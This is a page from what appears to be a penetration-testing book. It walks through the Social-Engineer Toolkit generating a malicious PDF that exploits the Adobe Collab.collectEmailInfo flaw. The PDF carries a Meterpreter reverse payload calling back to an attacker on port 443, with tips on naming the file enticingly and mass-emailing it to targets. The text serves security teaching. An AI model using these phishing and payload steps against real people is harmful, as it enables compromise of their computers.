background image

The Social-Engineer Toolkit

139

3. Windows Reverse VNC DLL

Spawn a VNC server on victim and send back to 

attacker.

4. Windows Reverse TCP Shell (x64)

Windows X64 Command Shell, Reverse TCP Inline

5. Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), 

Meterpreter

6. Windows Shell Bind_TCP (X64)

Execute payload and create an accepting port on 

remote system.

7. Windows Meterpreter Reverse HTTPS

Tunnel communication over HTTP using SSL and use 

Meterpreter.

 Enter the payload you want (press enter for default):

 

[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.10.1.112:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf

 1. Keep the filename, I don't care.

2. Rename the file, I want to be cool.

Enter your choice (enter for default): 

1

Keeping the filename and moving on.

From the SET main menu, select 

Spear-Phishing Attack Vectors

   fol-

lowed by 

Perform a Mass Email Attack

  . This attack infects a PDF file using 

the Adobe 

Collab.collectEmailInfo

 vulnerability  , a Metasploit Meterpreter 

reverse payload   that is the SET default. 

Collab.collectEmailInfo

 is a heap-

based exploit that, if opened (and if the target’s version of Adobe Acrobat 
is vulnerable to this exploit), will connect to the attacking workstation on 
port 443, which usually allows outbound traffic from most networks.

You are also given the option of renaming the malicious file to make 

it more enticing for the target to open. The default name (

template.pdf

) is 

selected   in this scenario for demonstration purposes.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.